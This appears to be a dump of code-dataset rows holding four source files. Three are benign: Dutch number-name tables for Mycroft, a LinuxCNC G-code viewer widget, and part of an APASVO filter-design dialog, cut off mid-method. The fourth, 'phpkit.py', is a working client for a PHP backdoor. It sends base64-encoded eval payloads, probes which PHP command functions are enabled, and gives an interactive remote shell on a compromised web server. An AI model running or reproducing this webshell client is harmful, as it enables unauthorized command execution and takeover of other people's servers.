repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
Dark5ide/mycroft-core | mycroft/util/lang/common_data_nl.py | 1 | 5932 | # -*- coding: utf-8 -*-
#
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
# Dutch definite articles; used to strip leading articles when normalising text.
_ARTICLES = {'de', 'het'}
# Dutch cardinal number names for 0-19 and the tens up to 90.
# Composite values (21, 35, ...) are presumably assembled elsewhere from
# these building blocks -- this table only holds the irreducible names.
_NUM_STRING_NL = {
    0: 'nul',
    1: 'een',
    2: 'twee',
    3: 'drie',
    4: 'vier',
    5: 'vijf',
    6: 'zes',
    7: 'zeven',
    8: 'acht',
    9: 'negen',
    10: 'tien',
    11: 'elf',
    12: 'twaalf',
    13: 'dertien',
    14: 'veertien',
    15: 'vijftien',
    16: 'zestien',
    17: 'zeventien',
    18: 'achttien',
    19: 'negentien',
    20: 'twintig',
    30: 'dertig',
    40: 'veertig',
    50: 'vijftig',
    60: 'zestig',
    70: 'zeventig',
    80: 'tachtig',
    90: 'negentig'
}
# Dutch fraction denominator names: key n maps to the spoken name of 1/n
# ('half' = 1/2, 'derde' = 1/3, ...), up to twentieths.
_FRACTION_STRING_NL = {
    2: 'half',
    3: 'derde',
    4: 'vierde',
    5: 'vijfde',
    6: 'zesde',
    7: 'zevende',
    8: 'achtste',
    9: 'negende',
    10: 'tiende',
    11: 'elfde',
    12: 'twaalfde',
    13: 'dertiende',
    14: 'veertiende',
    15: 'vijftiende',
    16: 'zestiende',
    17: 'zeventiende',
    18: 'achttiende',
    19: 'negentiende',
    20: 'twintigste'
}
# Long-scale number names (1e12 = 'biljoen'), ordered ascending so code can
# iterate from smallest to largest magnitude.
# NOTE(review): entries from 1e30 upward use English spellings
# ('quintillion', 'sextillion', ...) instead of Dutch ('quintiljoen', ...);
# verify against an authoritative Dutch number-name source before fixing.
# NOTE(review): float literals above ~1.8e308 overflow to float('inf'), so
# the 1e312/1e336/1e366 keys all collapse onto a single inf key and only the
# last value survives -- confirm whether callers ever reach this range.
_LONG_SCALE_NL = OrderedDict([
    (100, 'honderd'),
    (1000, 'duizend'),
    (1000000, 'miljoen'),
    (1e12, "biljoen"),
    (1e18, 'triljoen'),
    (1e24, "quadriljoen"),
    (1e30, "quintillion"),
    (1e36, "sextillion"),
    (1e42, "septillion"),
    (1e48, "octillion"),
    (1e54, "nonillion"),
    (1e60, "decillion"),
    (1e66, "undecillion"),
    (1e72, "duodecillion"),
    (1e78, "tredecillion"),
    (1e84, "quattuordecillion"),
    (1e90, "quinquadecillion"),
    (1e96, "sedecillion"),
    (1e102, "septendecillion"),
    (1e108, "octodecillion"),
    (1e114, "novendecillion"),
    (1e120, "vigintillion"),
    (1e306, "unquinquagintillion"),
    (1e312, "duoquinquagintillion"),
    (1e336, "sesquinquagintillion"),
    (1e366, "unsexagintillion")
])
_SHORT_SCALE_NL = OrderedDict([
(100, 'honderd'),
(1000, 'duizend'),
(1000000, 'miljoen'),
(1e9, "miljard"),
(1e12, 'biljoen'),
(1e15, "quadrillion"),
(1e18, "quintiljoen"),
(1e21, "sextiljoen"),
(1e24, "septiljoen"),
(1e27, "octiljoen"),
(1e30, "noniljoen"),
(1e33, "deciljoen"),
(1e36, "undeciljoen"),
(1e39, "duodeciljoen"),
(1e42, "tredeciljoen"),
(1e45, "quattuordeciljoen"),
(1e48, "quinquadeciljoen"),
(1e51, "sedeciljoen"),
(1e54, "septendeciljoen"),
(1e57, "octodeciljoen"),
(1e60, "novendeciljoen"),
(1e63, "vigintiljoen"),
(1e66, "unvigintiljoen"),
(1e69, "uuovigintiljoen"),
(1e72, "tresvigintiljoen"),
(1e75, "quattuorvigintiljoen"),
(1e78, "quinquavigintiljoen"),
(1e81, "qesvigintiljoen"),
(1e84, "septemvigintiljoen"),
(1e87, "octovigintiljoen"),
(1e90, "novemvigintiljoen"),
(1e93, "trigintiljoen"),
(1e96, "untrigintiljoen"),
(1e99, "duotrigintiljoen"),
(1e102, "trestrigintiljoen"),
(1e105, "quattuortrigintiljoen"),
(1e108, "quinquatrigintiljoen"),
(1e111, "sestrigintiljoen"),
(1e114, "septentrigintiljoen"),
(1e117, "octotrigintiljoen"),
(1e120, "noventrigintiljoen"),
(1e123, "quadragintiljoen"),
(1e153, "quinquagintiljoen"),
(1e183, "sexagintiljoen"),
(1e213, "septuagintiljoen"),
(1e243, "octogintiljoen"),
(1e273, "nonagintiljoen"),
(1e303, "centiljoen"),
(1e306, "uncentiljoen"),
(1e309, "duocentiljoen"),
(1e312, "trescentiljoen"),
(1e333, "decicentiljoen"),
(1e336, "undecicentiljoen"),
(1e363, "viginticentiljoen"),
(1e366, "unviginticentiljoen"),
(1e393, "trigintacentiljoen"),
(1e423, "quadragintacentiljoen"),
(1e453, "quinquagintacentiljoen"),
(1e483, "sexagintacentiljoen"),
(1e513, "septuagintacentiljoen"),
(1e543, "ctogintacentiljoen"),
(1e573, "nonagintacentiljoen"),
(1e603, "ducentiljoen"),
(1e903, "trecentiljoen"),
(1e1203, "quadringentiljoen"),
(1e1503, "quingentiljoen"),
(1e1803, "sescentiljoen"),
(1e2103, "septingentiljoen"),
(1e2403, "octingentiljoen"),
(1e2703, "nongentiljoen"),
(1e3003, "milliniljoen")
])
_ORDINAL_STRING_BASE_NL = {
1: 'eerste',
2: 'tweede',
3: 'derde',
4: 'vierde',
5: 'vijfde',
6: 'zesde',
7: 'zevende',
8: 'achtste',
9: 'negende',
10: 'tiende',
11: 'elfde',
12: 'twaalfde',
13: 'dertiende',
14: 'veertiende',
15: 'vijftiende',
16: 'zestiende',
17: 'zeventiende',
18: 'achttiende',
19: 'negentiende',
20: 'twintigste',
30: 'dertigste',
40: "veertigste",
50: "vijftigste",
60: "zestigste",
70: "zeventigste",
80: "tachtigste",
90: "negentigste",
10e3: "honderdste",
1e3: "duizendste"
}
_SHORT_ORDINAL_STRING_NL = {
1e6: "miloenste",
1e9: "miljardste",
1e12: "biljoenste",
1e15: "biljardste",
1e18: "triljoenste",
1e21: "trijardste",
1e24: "quadriljoenste",
1e27: "quadriljardste",
1e30: "quintiljoenste",
1e33: "quintiljardste"
# TODO > 1e-33
}
# Fold the shared base ordinals (1st..90th, 100th, 1000th) into the table.
_SHORT_ORDINAL_STRING_NL.update(_ORDINAL_STRING_BASE_NL)
_LONG_ORDINAL_STRING_NL = {
1e6: "miloenste",
1e9: "miljardste",
1e12: "biljoenste",
1e15: "biljardste",
1e18: "triljoenste",
1e21: "trijardste",
1e24: "quadriljoenste",
1e27: "quadriljardste",
1e30: "quintiljoenste",
1e33: "quintiljardste"
# TODO > 1e60
}
# Fold the shared base ordinals (1st..90th, 100th, 1000th) into the table.
_LONG_ORDINAL_STRING_NL.update(_ORDINAL_STRING_BASE_NL)
| apache-2.0 |
cdsteinkuehler/linuxcnc | lib/python/gladevcp/hal_sourceview.py | 2 | 9831 | #!/usr/bin/env python
# vim: sts=4 sw=4 et
# GladeVcp actions
#
# Copyright (c) 2011 Pavel Shramov <shramov@mexmat.net>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os, time
import gobject, gtk
from hal_widgets import _HalWidgetBase
import linuxcnc
from hal_glib import GStat
from hal_actions import _EMC_ActionBase, _EMC_Action
from hal_filechooser import _EMC_FileChooser
import gtksourceview2 as gtksourceview
class EMC_SourceView(gtksourceview.View, _EMC_ActionBase):
    # GtkSourceView-based G-code viewer/editor wired to LinuxCNC status
    # signals (GStat): loads the running program, highlights the line
    # currently executed ('motion' mark category) and supports text search,
    # run-at-line selection and undo/redo.
    # NOTE(review): indentation was reconstructed from an indentation-less
    # dump of this file; nesting follows the obvious reading of the code.
    __gtype_name__ = 'EMC_SourceView'

    def __init__(self, *a, **kw):
        gtksourceview.View.__init__(self, *a, **kw)
        self.filename = None          # path of the currently loaded program
        self.mark = None              # source mark for the 'motion' highlight
        self.offset = 0               # currently highlighted line number
        self.program_length = 0       # number of lines in the loaded program
        self.buf = gtksourceview.Buffer()
        self.buf.set_max_undo_levels(10)
        self.update_iter()
        # Iters become invalid on any buffer change, so refresh them then.
        self.buf.connect('changed', self.update_iter)
        self.set_buffer(self.buf)
        self.lm = gtksourceview.LanguageManager()
        # Add LinuxCNC's bundled language spec (.ngc highlighting) if the
        # environment points at an install tree.
        if 'EMC2_HOME' in os.environ:
            path = os.path.join(os.environ['EMC2_HOME'], 'share/gtksourceview-2.0/language-specs/')
            self.lm.set_search_path(self.lm.get_search_path() + [path])
        self.buf.set_language(self.lm.get_language('.ngc'))
        self.set_show_line_numbers(True)
        self.set_show_line_marks(True)
        self.set_highlight_current_line(True)
        self.set_mark_category_icon_from_icon_name('motion', 'gtk-forward')
        self.set_mark_category_background('motion', gtk.gdk.Color('#ff0'))

    def _hal_init(self):
        _EMC_ActionBase._hal_init(self)
        # Reload on file change; the 1 ms timeout defers the load into the
        # GLib main loop instead of running it inside the signal handler.
        self.gstat.connect('file-loaded', lambda w, f: gobject.timeout_add(1, self.load_file, f))
        self.gstat.connect('line-changed', self.highlight_line)
        self.gstat.connect('interp_idle', lambda w: self.set_line_number(0))

    def set_language(self, lang, path = None):
        # path = the search path for the language file; if None, use the
        # default LinuxCNC spec directory.
        # lang = the language id to activate in the buffer.
        if path == None:
            path = os.path.join(os.environ['EMC2_HOME'], 'share/gtksourceview-2.0/language-specs/')
        self.lm.set_search_path(path)
        self.buf.set_language(self.lm.get_language(lang))

    def get_filename(self):
        return self.filename

    # Loads the file while not allowing the undo machinery to unload the
    # program afterwards (begin_not_undoable_action). Updates the iters
    # because iters become invalid when anything changes, clears the
    # buffer-modified flag, and highlights the line LinuxCNC is executing.
    # If called without a filename, the existing file is reloaded.
    def load_file(self, fn=None):
        self.buf.begin_not_undoable_action()
        if fn == None:
            fn = self.filename
        self.filename = fn
        if not fn:
            # NOTE(review): this early return leaves the not-undoable
            # action open -- presumably harmless for an empty buffer, but
            # worth confirming against the GtkSourceView API.
            self.buf.set_text('')
            return
        self.buf.set_text(open(fn).read())
        self.buf.end_not_undoable_action()
        self.buf.set_modified(False)
        self.update_iter()
        self.highlight_line(self.gstat, self.gstat.stat.motion_line)
        self.offset = self.gstat.stat.motion_line
        # Count lines for check_offset() clamping (file() is Python 2).
        f = file(fn, 'r')
        p = f.readlines()
        f.close()
        self.program_length = len(p)

    # Moves the highlight one line down (to a HIGHER line number).
    # Useful for run-at-line selection.
    # (The original comment said "lower numbered", contradicting the code.)
    def line_down(self):
        self.offset +=1
        self.check_offset()
        self.highlight_line(self.gstat, self.offset)

    # Moves the highlight one line up (to a LOWER line number).
    # Useful for run-at-line selection.
    def line_up(self):
        self.offset -=1
        self.check_offset()
        self.highlight_line(self.gstat, self.offset)

    def get_line_number(self):
        return self.offset

    # Sets the highlight line to a specified line (clamped to the program).
    def set_line_number(self,linenum):
        self.offset = linenum
        self.check_offset()
        self.highlight_line(self.gstat, self.offset)

    def check_offset(self):
        # Clamp the highlight offset into [0, program_length].
        if self.offset < 0:
            self.offset = 0
        elif self.offset > self.program_length:
            self.offset = self.program_length

    def highlight_line(self, w, l):
        # Move (or create) the 'motion' mark onto line l (1-based);
        # l == 0/None removes the highlight entirely.
        self.offset = l
        if not l:
            if self.mark:
                self.buf.delete_mark(self.mark)
                self.mark = None
            return
        line = self.buf.get_iter_at_line(l-1)
        if not self.mark:
            self.mark = self.buf.create_source_mark('motion', 'motion', line)
            self.mark.set_visible(True)
        else:
            self.buf.move_mark(self.mark, line)
        self.scroll_to_mark(self.mark, 0, True, 0, 0.5)

    # Iters are invalid (and will cause a complete crash) after any change,
    # so we have to refresh them after every buffer modification.
    def update_iter(self,widget=None):
        self.start_iter = self.buf.get_start_iter()
        self.end_iter = self.buf.get_end_iter()
        self.current_iter = self.start_iter.copy()

    # Searches the buffer for a text string, forward or backward, with
    # mixed case or exact text. When the search hits either end, pressing
    # search again wraps around to the other end. Grabs focus, selects the
    # match and scrolls to it automatically.
    def text_search(self,direction=True,mixed_case=True,text="t"):
        caseflag = 0
        if mixed_case:
            caseflag = gtksourceview.SEARCH_CASE_INSENSITIVE
        if direction:
            # Forward search; wrap to the start when at the end.
            if self.current_iter.is_end():
                self.current_iter = self.start_iter.copy()
            found = gtksourceview.iter_forward_search(self.current_iter,text,caseflag, None)
        else:
            # Backward search; wrap to the end when at the start.
            if self.current_iter.is_start():
                self.current_iter = self.end_iter.copy()
            found = gtksourceview.iter_backward_search(self.current_iter,text,caseflag, None)
        if found:
            match_start,match_end = found
            self.buf.select_range(match_start,match_end)
            if direction:
                self.buf.place_cursor(match_start)
                self.grab_focus()
                # Resume the next forward search after this match.
                self.current_iter = match_end.copy()
            else:
                self.buf.place_cursor(match_start)
                self.grab_focus()
                # Resume the next backward search before this match.
                self.current_iter = match_start.copy()
            self.scroll_to_iter(match_start, 0, True, 0, 0.5)
            self.set_highlight_current_line(True)
        else:
            self.current_iter = self.start_iter.copy()
            self.set_highlight_current_line(False)

    # Undo one level of changes.
    def undo(self):
        self.buf.undo()

    # Redo one level of changes.
    def redo(self):
        self.buf.redo()
def safe_write(filename, data, mode=0o644):
    """Atomically write *data* to *filename*.

    The data is written to a temporary file in the destination directory
    and then renamed over the target, so readers never observe a partially
    written file.  On failure the temporary file is cleaned up.

    filename -- destination path (must contain a directory component,
                since the temp file is created alongside it)
    data     -- the bytes/str to write
    mode     -- permission bits for the resulting file

    BUG FIX: the *mode* argument was previously accepted but never applied;
    mkstemp always creates files as 0600, so saved files silently lost the
    requested permissions.  os.chmod() now honours it before the rename.
    """
    import os, tempfile
    fd, fn = tempfile.mkstemp(dir=os.path.dirname(filename),
                              prefix=os.path.basename(filename))
    try:
        os.write(fd, data)
        os.close(fd)
        fd = None
        os.chmod(fn, mode)       # apply requested permissions (was ignored)
        os.rename(fn, filename)  # atomic replace on POSIX
    finally:
        if fd is not None:
            os.close(fd)
        if os.path.isfile(fn):
            os.unlink(fn)
class EMC_Action_Save(_EMC_Action, _EMC_FileChooser):
    # Action that saves the buffer of the associated EMC_SourceView back to
    # its current file (via safe_write) and reloads it into LinuxCNC.
    # NOTE(review): indentation reconstructed from an indentation-less dump.
    __gtype_name__ = 'EMC_Action_Save'
    # GObject property linking this action to the textview it saves.
    __gproperties__ = { 'textview' : (EMC_SourceView.__gtype__, 'Textview',
                    "Corresponding textview widget", gobject.PARAM_READWRITE),
    }

    def __init__(self, *a, **kw):
        _EMC_Action.__init__(self, *a, **kw)
        self.textview = None

    def _hal_init(self):
        _EMC_Action._hal_init(self)

    def on_activate(self, w):
        # Nothing to save without a bound textview that has a filename.
        if not self.textview or not self.textview.filename:
            return
        self.save(self.textview.filename)

    def save(self, fn):
        # Persist the buffer atomically, clear the modified flag, then ask
        # LinuxCNC to reload the file.
        b = self.textview.get_buffer()
        b.set_modified(False)
        safe_write(fn, b.get_text(b.get_start_iter(), b.get_end_iter()))
        self._load_file(fn)

    def do_set_property(self, property, value):
        # GObject property setter ('-' in property names maps to '_').
        name = property.name.replace('-', '_')
        if name == 'textview':
            self.textview = value
        else:
            return _EMC_Action.do_set_property(self, property, value)

    def do_get_property(self, property):
        # GObject property getter, mirror of do_set_property above.
        name = property.name.replace('-', '_')
        if name == 'textview':
            return self.textview
        else:
            return _EMC_Action.do_get_property(self, property)
class EMC_Action_SaveAs(EMC_Action_Save):
    # Variant of EMC_Action_Save that pops up a file chooser so the user
    # can pick a new destination; remembers the last-used folder.
    __gtype_name__ = 'EMC_Action_SaveAs'

    def __init__(self, *a, **kw):
        _EMC_Action.__init__(self, *a, **kw)
        self.textview = None
        self.currentfolder = os.path.expanduser("~/linuxcnc/nc_files")

    def on_activate(self, w):
        if not self.textview:
            return
        dialog = gtk.FileChooserDialog(title="Save As",action=gtk.FILE_CHOOSER_ACTION_SAVE,
                    buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
        dialog.set_do_overwrite_confirmation(True)
        dialog.set_current_folder(self.currentfolder)
        # Pre-fill the name box with the current file's basename, if any.
        if self.textview.filename:
            dialog.set_current_name(os.path.basename(self.textview.filename))
        dialog.show()
        r = dialog.run()
        fn = dialog.get_filename()
        dialog.destroy()
        if r == gtk.RESPONSE_OK:
            self.save(fn)  # inherited from EMC_Action_Save
            self.currentfolder = os.path.dirname(fn)
| lgpl-2.1 |
a5216652166/webshell | php/phpkit-0.2a/phpkit.py | 26 | 3361 | #!/usr/bin/python
# Client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
# Bail out unless exactly one argument (the backdoor URL) was supplied.
if (len(sys.argv) != 2):
    print "Usage: " + sys.argv[0] + " <url of backdoor>"
    print "Example: " + sys.argv[0] + " http://localhost/odd.php"
    sys.exit(0)
url = sys.argv[1]  # target URL hosting the php://input backdoor
tester = """echo w00tw00tw00t"""   # probe command run through each PHP exec function
testkey = """w00tw00tw00t"""       # marker expected in the response if the probe ran
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
    """Build the obfuscated PHP payload that runs *cmd* via *func*.

    func -- one of 'system', 'shellexec', 'passthru' or 'exec'
    cmd  -- shell command to execute on the target
    Returns the PHP snippet to POST to the php://input backdoor.
    Raises ValueError for an unknown *func* (the old code crashed with an
    unhelpful NameError because *rawphp* was never assigned).

    BUG FIX: uses the base64 module instead of the Python-2-only
    str.encode('base64') codec.  The codec also appended a newline inside
    the payload; PHP's base64_decode() skips such whitespace, so dropping
    it does not change what executes on the target.
    """
    import base64
    if func == "system":
        rawphp = """system('%s');""" % (cmd)
    elif func == "shellexec":
        rawphp = """echo shell_exec('%s');""" % (cmd)
    elif func == "passthru":
        rawphp = """passthru('%s');""" % (cmd)
    elif func == "exec":
        rawphp = """echo exec('%s');""" % (cmd)
    else:
        raise ValueError("unsupported PHP function: %r" % (func,))
    encodedphp = base64.b64encode(rawphp.encode()).decode()
    payload = """<?php eval(base64_decode('%s')); ?>""" % (encodedphp)
    return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
### ###
# End of functions and object oriented stuff #
### ###
# the main body
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
| gpl-3.0 |
jemromerol/apasvo | apasvo/gui/views/FilterDesing.py | 1 | 12915 | # encoding: utf-8
'''
@author: Jose Emilio Romero Lopez
@copyright: Copyright 2013-2014, Jose Emilio Romero Lopez.
@license: GPL
@contact: jemromerol@gmail.com
This file is part of APASVO.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from PySide import QtCore
from PySide import QtGui
import matplotlib
matplotlib.rcParams['backend'] = 'qt4agg'
matplotlib.rcParams['backend.qt4'] = 'PySide'
matplotlib.rcParams['patch.antialiased'] = False
matplotlib.rcParams['agg.path.chunksize'] = 80000
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from apasvo.gui.views import navigationtoolbar
from apasvo.gui.views import processingdialog
from apasvo.utils import clt
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import butter, lfilter, freqz
import numpy as np
import traceback
from apasvo.picking import apasvotrace as rc
from apasvo.picking import takanami
from apasvo._version import _application_name
from apasvo._version import _organization
MINIMUM_MARGIN_IN_SECS = 0.5
class FilterDesignTask(QtCore.QObject):
    """Qt task object for the filter-design dialog.

    NOTE(review): the original docstring was copied from the Takanami
    picking task and described `start`/`end` attributes that do not exist
    here; this class only holds the record and declares the signals below.

    Attributes:
        record: An opened seismic record.

    Signals:
        finished: Emitted when the task finishes.
        error: Emitted with (message, details) on failure.
        position_estimated: Emitted with (position, data, index); appears
            to be a leftover from the Takanami task -- nothing in this
            file emits it.
    """

    finished = QtCore.Signal()
    error = QtCore.Signal(str, str)
    position_estimated = QtCore.Signal(int, np.ndarray, int)

    def __init__(self, record):
        super(FilterDesignTask, self).__init__()
        self.record = record
class FilterDesignDialog(QtGui.QDialog):
    """Dialog for interactively designing a Butterworth band-pass filter.

    Plots the filter's frequency response (magnitude in dB plus phase on a
    twin axis) and lets the user choose the lower/upper cutoff frequencies,
    the filter order, and zero-phase filtering.  Choices are persisted via
    QSettings and restored on the next open.

    NOTE(review): the original docstring was copied from the Takanami
    picking dialog and did not describe this class; rewritten to match the
    code.  Indentation was reconstructed from an indentation-less dump.
    """

    def __init__(self, stream, trace_list=None, parent=None):
        super(FilterDesignDialog, self).__init__(parent)
        # Calc max. frequency: the highest sampling rate among the traces
        # is used as the design sampling rate below.
        traces = stream.traces if not trace_list else trace_list
        self.max_freq = max([trace.fs for trace in traces])
        self._init_ui()
        self.load_settings()
        # Initial draw of the frequency response curves.
        w, h_db, angles = self._retrieve_filter_plot_data()
        self._module_data = self.module_axes.plot(w, h_db, 'b')[0]
        self._phase_data = self.phase_axes.plot(w, angles, 'g')[0]
        self.module_axes.set_ylim([-60,10])
        self.phase_axes.set_ylim([min(angles), max(angles)])
        self.canvas.draw_idle()
        # Keep the band valid and redraw whenever a parameter changes.
        self.start_point_spinbox.valueChanged.connect(self.on_freq_min_changed)
        self.end_point_spinbox.valueChanged.connect(self.on_freq_max_changed)
        self.start_point_spinbox.valueChanged.connect(self._draw_filter_response)
        self.end_point_spinbox.valueChanged.connect(self._draw_filter_response)
        self.number_coefficient_spinbox.valueChanged.connect(self._draw_filter_response)
        self.zeroPhaseCheckBox.toggled.connect(self._draw_filter_response)
        self.button_box.accepted.connect(self.accept)
        self.button_box.rejected.connect(self.reject)
        self.button_box.clicked.connect(self.on_click)

    def _init_ui(self):
        # Build the whole dialog: matplotlib canvas + parameter group boxes.
        self.setWindowTitle("Filter Design (Butterworth-Bandpass Filter)")
        self.fig, _ = plt.subplots(1, 1, sharex=True)
        # Set up filter axes: magnitude on the left y-axis, phase on a twin.
        self.module_axes = self.fig.axes[0]
        self.phase_axes = self.module_axes.twinx()
        self.module_axes.set_title('Digital filter frequency response (Butterworth-Bandpass filter)')
        self.module_axes.set_xlabel('Frequency [Hz]')
        self.module_axes.set_ylabel('Amplitude [dB]', color='b')
        self.module_axes.axis('tight')
        self.module_axes.grid(which='both', axis='both')
        self.phase_axes.set_ylabel('Angle (radians)', color='g')
        self.canvas = FigureCanvas(self.fig)
        self.canvas.setMinimumSize(self.canvas.size())
        self.canvas.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Expanding,
                                                    QtGui.QSizePolicy.Policy.Expanding))
        self.toolBarNavigation = navigationtoolbar.NavigationToolBar(self.canvas, self)
        # Group boxes: box=low cutoff, box4=high cutoff, box3=order,
        # box2=zero-phase (box2 is unused in the final layout, see below).
        self.group_box = QtGui.QGroupBox(self)
        self.group_box2 = QtGui.QGroupBox(self)
        self.group_box3 = QtGui.QGroupBox(self)
        self.group_box4 = QtGui.QGroupBox(self)
        self.group_box.setTitle("")
        self.group_box2.setTitle("")
        self.group_box3.setTitle("Parameters")
        self.start_point_label = QtGui.QLabel("Lower cutoff frequency (Hz): ")
        self.start_point_label.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
                                                               QtGui.QSizePolicy.Policy.Preferred))
        self.start_point_spinbox = QtGui.QDoubleSpinBox(self.group_box)
        self.start_point_spinbox.setMinimum(1.0)
        self.start_point_spinbox.setSingleStep(1.00)
        self.start_point_spinbox.setAccelerated(True)
        # Cutoffs are capped at the Nyquist frequency (fs / 2).
        self.start_point_spinbox.setMaximum(self.max_freq * 0.5)
        self.end_point_label = QtGui.QLabel("Higher cutoff frequency (Hz):")
        self.end_point_label.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
                                                             QtGui.QSizePolicy.Policy.Preferred))
        self.end_point_spinbox = QtGui.QDoubleSpinBox(self.group_box4)
        self.end_point_spinbox.setMinimum(1.0)
        self.end_point_spinbox.setSingleStep(1.00)
        self.end_point_spinbox.setAccelerated(True)
        self.end_point_spinbox.setMaximum(self.max_freq * 0.5)
        self.end_point_spinbox.setValue(5.0)
        #######################################################################
        self.number_coefficient_label = QtGui.QLabel("Order: ")
        self.number_coefficient_label2 = QtGui.QLabel("")
        self.number_coefficient_label.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
                                                                      QtGui.QSizePolicy.Policy.Preferred))
        self.number_coefficient_label2.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
                                                                       QtGui.QSizePolicy.Policy.Preferred))
        self.number_coefficient_spinbox = QtGui.QSpinBox(self.group_box3)
        self.number_coefficient_spinbox.adjustSize()
        self.number_coefficient_spinbox.setMinimum(1)
        self.number_coefficient_spinbox.setSingleStep(1)
        self.number_coefficient_spinbox.setAccelerated(True)
        self.zeroPhaseCheckBox = QtGui.QCheckBox("Zero phase filtering", self.group_box2)
        self.zeroPhaseCheckBox.setChecked(True)
        #######################################################################
        self.group_box_layout = QtGui.QHBoxLayout(self.group_box)
        self.group_box_layout.setContentsMargins(9, 9, 9, 9)
        self.group_box_layout.setSpacing(12)
        self.group_box_layout.addWidget(self.start_point_label)
        self.group_box_layout.addWidget(self.start_point_spinbox)
        self.group_box4_layout = QtGui.QHBoxLayout(self.group_box4)
        self.group_box4_layout.setContentsMargins(9, 9, 9, 9)
        self.group_box4_layout.setSpacing(12)
        self.group_box4_layout.addWidget(self.end_point_label)
        self.group_box4_layout.addWidget(self.end_point_spinbox)
        #####################################################################
        self.group_box2_layout = QtGui.QHBoxLayout(self.group_box2)
        self.group_box2_layout.setContentsMargins(9, 9, 9, 9)
        self.group_box2_layout.setSpacing(12)
        self.group_box2_layout.addWidget(self.zeroPhaseCheckBox)
        ###################################################################
        self.group_box3_layout = QtGui.QHBoxLayout(self.group_box3)
        self.group_box3_layout.setContentsMargins(9, 9, 9, 9)
        self.group_box3_layout.setSpacing(12)
        self.group_box3_layout.addWidget(self.number_coefficient_label)
        self.group_box3_layout.addWidget(self.number_coefficient_spinbox)
        self.group_box3_layout.addWidget(self.number_coefficient_label2)
        #####################################################################
        self.button_box = QtGui.QDialogButtonBox(self)
        self.button_box.setOrientation(QtCore.Qt.Horizontal)
        self.button_box.setStandardButtons(QtGui.QDialogButtonBox.Apply |
                                           QtGui.QDialogButtonBox.Cancel |
                                           QtGui.QDialogButtonBox.Ok)
        self.layout = QtGui.QVBoxLayout(self)
        self.layout.setContentsMargins(9, 9, 9, 9)
        self.layout.setSpacing(6)
        self.layout.addWidget(self.toolBarNavigation)
        self.layout.addWidget(self.canvas)
        self.layout.addWidget(self.group_box3)
        self.layout.addWidget(self.group_box)
        self.layout.addWidget(self.group_box4)
        # The checkbox is added directly instead of inside group_box2.
        #self.layout.addWidget(self.group_box2)
        self.layout.addWidget(self.zeroPhaseCheckBox)
        self.layout.addWidget(self.button_box)

    def on_freq_min_changed(self, value):
        # Keep the band valid: the upper cutoff must stay above the lower.
        self.end_point_spinbox.setMinimum(value + 1.0)

    def on_freq_max_changed(self, value):
        # Mirror constraint: the lower cutoff must stay below the upper.
        self.start_point_spinbox.setMaximum(value - 1.0)

    def on_click(self, button):
        # Ok persists the settings; Apply just redraws the response.
        if self.button_box.standardButton(button) == QtGui.QDialogButtonBox.Ok:
